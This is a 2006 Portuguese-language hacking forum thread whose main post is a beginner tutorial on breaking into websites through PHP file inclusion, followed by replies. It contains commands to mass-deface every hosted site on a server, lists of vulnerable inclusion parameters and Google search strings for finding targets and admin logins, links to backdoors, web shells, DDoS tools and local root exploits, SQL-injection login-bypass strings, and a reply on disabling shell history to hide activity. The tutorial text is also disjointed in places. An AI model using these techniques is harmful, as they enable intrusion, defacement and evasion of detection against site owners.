Tuto Definitivo sobre como Ownar por php injection

Started by _Dr4k0_, 10 de August , 2006, 07:48:25 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

_Dr4k0_

Tutorial bem rodado porém acho que é o melhor e com mais simples explicação..não sei se jah foi psotado aqui se já foi desculpe!!

Tutorial

Tutorial completo de php injection para iniciantes


Tutorial desenvolvido pelo SmartBoy_ e modificado por eu by Conn3ct

( Poucas modificações so dei uma atualizada e colokei os links pq os antigos não funfam mais )



1) Introdução

Já que muita gente pede ajuda sobre php injection, resolvi fazer
um tutorial de simples entendimento pra facilitar a vida da galera new.
Esta falha consiste em usuários incluirem scripts no codigo php da
vitima e este ser executado. Quando corretamente utilizado, que é o que
explicarei nesse tutorial, o intruso pode setar comandos ao servidor.
Boa parte do processo pode ser feito pelo próprio browser (IE,
mozilla, netscape...).
Tentarei explicar como procura, explora e corrige o bug. Espero
ser util para todos :P

Obs2.: No final, terão urls com os programas citados.



2) O que é o que

Vitima : Site que você irá explorar a falha de php.
String : Arquivos no site suceptiveis ao ataque.
Cmd : Script em PHP que nos possibilita digitar
comandos a serem incluidos no php.
Backdoor : Abre portas no sistema para conexão remota 'sem
autenticação'.
Connect Back : Abre uma porta especifica para conexao entre seu
pc e a vitima.
Exploit : Programa que explora certa falha num sistema.
Há vários tipos de Exploits. Aqui, iremos
tratar apenas com Local Root Exploits. (exploram
falhas localmente que levam usuários comuns a
acesso root - super-usuário -)
Shell : É um programa interpretador de comandos que
permite ao usuário iteragir com o sistema
operacional através de comandos digitados.
Telnet : Utilizaremos para conexões remotas.
Firewall : É uma barreira inteligente entre uma rede local
e a Internet, através da qual só passa tráfego
autorizado. Este tráfego é examinado pelo
firewall em tempo real e a seleção é feita de
acordo com a regra."o que não foi expressamente
permitido, é proibido"
root : Super-usuário. É o admin... tem acesso total ao
sistema.



------------------- No browser


3) Strings

Há várias strings disponíveis. Neste tutorial, irei utilizar para
exemplos uma bem simples que é " index.php?page= ". Em anexo, no final,
várias outras :P

<----

Agora, onde está isso? GERALMENTE nas pastas /etc/httpd/conf ou
/etc/apache/conf mas varia muito e pode ser encontrado em outros
locais. Uma maneira eficaz, porem demorada, de encontrar é fazendo uma
busca completa pelo sitema. Comando:
find / -name httpd.conf
Isto imprime onde está o httpd.conf no servidor. Pode aparecer
mais que um resultado, vá testando :P

Agora, o final: trocar todas as outras pela sua. Simples, basta um
comando para isso:

find /pasta/onde/estão/os/sites -name "index.*" -exec cp
/onde/está/sua/index.html {} \;

Para saber onde estão os sites, só pwd na cmd. Ex:
/home/httpd/vhosts/nasa.gov/web
Nota-se que todos os outros estão em /home/httpd/vhosts.

Faça o upload igual backdoor. wget http://suaindex.com/sua.index
Digamos que você fez para a pasta /tmp , então, o comando ficaria
assim:

find /home/httpd/vhosts -name "index.*" -exec cp /tmp/index.html
{} \;


Agora é só aguradar um pouco que todos os sites serão pinchados :D


Greetz pra tds do irc
#rsy - irc.gigachat.net
#noturno - irc.brasnet.org
#r0x - irc.rizon.net



-------------------------------- Strings ccomuns

/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/include/write.php?dir=
/inc/step_one_tables.php?server_inc=



-------------------------------- Arquivos úteis


Backdoors

URL Porta
http://www.derf.hpgvip.com.br/cgi 44464
http://www.derf.hpgvip.com.br/derfbd 6697

CMD
http://www.derf.hpgvip.com.br/newcmd.gif
http://www.derf.hpgvip.com.br/lila.jpg


dDoS
http://www.derf.hpgvip.com.br/f3

xpl local
http://www.derf.hpgvip.com.br/derfxpl/



 
1

Site:http://www.canal-owned.br.nu/
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

anakim

hehehe, ae Drako q coincidencia hj  cedo msm eu tava lendo esse texto,kkkk, bom texto, flws ae!!!
Why use Windows? If I have the door ;-)

Anonymous

SHELL

* http://dot.hazard.free.fr/hacking/explo ... 9shell.txt?
http://home.comcast.net/~mr-meeks/r57.txt?
http://phpshell.mackatack.com/source.txt?
http://vnc2007.netfast.org/tr57.txt?
http://h1.ripway.com/vnc2007/tool25.txt?
http://phpshell.mackatack.com/source.txt?
http://sh3ll.netfast.org/list.txt?

CMD's

http://www.exploits.pop.com.br/xpl.png?&cmd=
http://rootsystem.100free.com/cmd/cse.gif?&cmd=
http://packs.by.ru/cmd/cmd2.gif?&cmd=
http://www.derf.hpgvip.com.br/newcmd.gif?&cmd=
http://www.derf.hpgvip.com.br/lila.jpg?&cmd=
http://beforethehighway.com/phpmyadmin/osx-sux.jpg?
http://xgasperx.v10.com.br/cmd.txt?&cmd=
http://packs.by.ru/cmd/phpshell.gif
http://packs.by.ru/cmd/cmd2.gif
http://packs.by.ru/cmd/r57.gif
http://packs.by.ru/cmd/tk.gif
http://packs.by.ru/cmd/tk.php

Exploits

http://www.derf.hpgvip.com.br/derfxpl/
http://packs.by.ru/xploits/brk2
http://packs.by.ru/xploits/elflbl
http://packs.by.ru/xploits/h00lyshit
http://packs.by.ru/xploits/kmod
http://packs.by.ru/xploits/kmod2
http://packs.by.ru/xploits/krad
http://packs.by.ru/xploits/krad2
http://packs.by.ru/xploits/krad3
http://packs.by.ru/xploits/p
http://packs.by.ru/xploits/panicbsd.c
http://packs.by.ru/xploits/prctl
http://packs.by.ru/xploits/ptrace-kmod
http://packs.by.ru/xploits/ptrace24
http://packs.by.ru/xploits/r0nin
http://packs.by.ru/xploits/r0nin2
http://packs.by.ru/xploits/raptor
http://packs.by.ru/xploits/raptor_prctl
http://packs.by.ru/xploits/rootbsd
http://packs.by.ru/xploits/sun8
http://packs.by.ru/xploits/suse8.2
http://packs.by.ru/xploits/uselib24
http://www.baixinhoo.hpgvip.com.br/f3
http://packs.by.ru/f3
http://caralesgal.by.ru/exploits/r0nin

para kernel 2.6.*

http://www.milw0rm.com/exploits/2006

Strings para pesquisar no Google

/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/include/write.php?dir=
/inc/step_one_tables.php?server_inc=
editfunc.inc.php?NWCONF_SYSTEM[server_path]=

Strings Vuln's Admin:

allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
allinurl:/home/adm/index.asp
allinurl:/home/adm/defaul.asp
allinurl:/menu/admin/index.asp
allinurl:/menu/admin/default.asp
allinurl:/menu/admin/login.asp
allinurl:/menu/admin/admin.asp
allinurl:/painel/admin/admin.asp
allinurl:/painel/admin/login.asp
allinurl:/painel/admin/index.asp
allinurl:/painel/admin/default.asp
allinurl:/site/admin/default.asp
allinurl:/site/admin/index.asp
allinurl:/site/admin/login.asp
allinurl:/asp/admin/login.asp
allinurl:/asp/admin/index.asp
allinurl:/asp/admin/default.asp
allinurl:/shop/admin/default.asp
allinurl:/shop/admin/index.asp
allinurl:/shop/admin/login.asp
allinurl:/ecommerce/admin/index.asp
allinurl:/ecommerce/admin/default.asp
allinurl:/ecommerce/admin/login.asp
allinurl:/pedidos/admin/default.asp
allinurl:/pedidos/admin/index.asp
allinurl:/pedidos/admin/login.asp
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
allinurl:/eshop/admin/
allinurl:/eshop/admin.asp
allinurl:/eshop/admin/default.asp
allinurl:/eshop/admin/index.asp
allinurl:/comercio/admin.asp
allinurl:/comercio/admin/default.asp
allinurl:/comercio/admin/index.asp
allinurl:/news/admin/login.asp
allinurl:/news/admin/default.asp
allinurl:/news/admin/index.asp
allinurl:/imprensa/login.asp
allinurl:/imprensa/admin.asp
allinurl:/imprensa/admin/default.asp
allinurl:/imprensa/admin/index.asp
allinurl:/imprensa/admin/login.asp
allinurl:/banners/admin.asp
allinurl:/banners/admin/default.asp
allinurl:/banners/admin/index.asp
allinurl:/banners/admin/login.asp
allinurl: allinurl:/banner/admin/
allinurl:/banner/admin/default.asp
allinurl:/banner/admin/index.asp
allinurl:/newsleter/admin.asp
allinurl:/newsleter/admin/default.asp
allinurl:/newsleter/admin/index.asp
allinurl:/principal/admin.asp
allinurl:/principal/admin/default.asp
allinurl:/principal/admin/index.asp
allinurl:/principal/admin/login.asp
allinurl:/editar/admin.asp
allinurl:/editar/admin/login.asp
allinurl:/editar/admin/index.asp
allinurl:/editar/admin/default.asp
allinurl:/form/admin.asp
allinurl:/admin/admin.asp
allinurl:/admin/index.asp
allinurl:/admin/admin/default.asp
allinurl:/edit/admin/index.asp
allinurl:/edit/admin/default.asp
allinurl:/menu/admin/senha.asp
allinurl:/painel/admin/senha.asp
allinurl:/menu_admin/senha.asp
allinurl:/pedidos/admin/senha.asp
allinurl:/vendas/admin/senha.asp
allinurl:/principal/admin/senha.asp
allinurl:/home/admin/senha.asp
allinurl:/news/admin/senha.asp
allinurl:/noticias/admin/senha.asp
allinurl:/portal/admin/senha.asp
allinurl:/site/admin/senha.asp
allinurl:/admin/admin/adm.asp
allinurl:/admin/adm/senha.asp
allinurl:/adm/admin/login.asp
allinurl:/adm/admin/index.asp
allinurl:/adm/admin/default.asp
allinurl:/admin/loja/senha.asp
allinurl:/admin/lojas/default.asp
allinurl:/admin/lojas/index.asp
allinurl:/loja/admin.asp
allinurl:/db/admin/index.asp
allinurl:/db/admin/login.asp
allinurl:/db/admin/default.asp
allinurl:/db/admin/senha.asp
allinurl:/host/admin/default.asp
allinurl:/host/admin/index.asp
allinurl:/host/admin/login.asp
allinurl:/login/admin.asp
allinurl:/login_admin/index.asp
allinurl:/login_admin/default.asp
allinurl:/login_admin/login.asp
allinurl:/store/admin.asp
allinurl:/store/admin/default.asp
allinurl:/store/admin/index.asp
allinurl:/stroe/admin/login.asp
allinurl:/images/admin/
allinurl:/client/admin.asp
allinurl:/order/admmin.asp
allinurl:/order/admin/index.asp
allinurl:/order/admin/login.asp
allinurl:/order/admin/default.asp
allinurl:/admin/senha.asp
allinurl:/strore/admin/senha.asp
allinurl:/controle/admin.asp
allinurl:/controle/admin/index.asp
allinurl:/controle/admin/default.asp
allinurl:/controle/admin/login.asp
allinurl:/parceiros/admin.asp
allinurl:/parceiros/admin/login.asp
allinurl:/parceiros/admin/default.asp
allinurl:/parceiros/admin/index.asp
allinurl:/administrador/login.asp
allinurl:/webmaster/login.asp
allinurl:/webmaster/senha.asp
allinurl:/webmaster/autenticar.asp
allinurl:/admin/autenticar.asp
allinurl:/admin/logout.asp
allinurl:/admin/logar.asp
allinurl:/webmaster/logar.asp
allinurl:/store/admin/logar.asp
allinurl:/shopping/admin.asp
allinurl:/shopping/admin/login.asp
allinurl:/shopping/admin/index.asp
allinurl:/shopping/admin/default.asp
allinurl:/admin/menu.asp
allinurl:/admin/painel.asp
allinurl:/shop/admin/logar.asp
allinurl:/admin/acesso.asp
allinurl:/restrito/admin.asp
allinurl:/restrito/acesso/admin.asp
allinurl:/restrito/adm/login.asp
allinurl:/webmaster/entrar.asp
allinurl:/admin/site/entrar.asp
allinurl:/ecommerce/admin/index.asp
allinurl:/ecommerce/admin/default.asp
allinurl:/ecommerce/admin/login.asp

Or's

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

^^

Anonymous


Anonymous

Parabéns Dr4k0,

isso vai me ajudar muito to começando agora  ;D

Anonymous

Ao inves de remover os logs dos comandos executados na shell e nao registrar o que voce esta fazendo...
export HISTSIZE=0ou
unset HISTFILE
p.s. Ficou legal... o unico porem sao erros de escrita.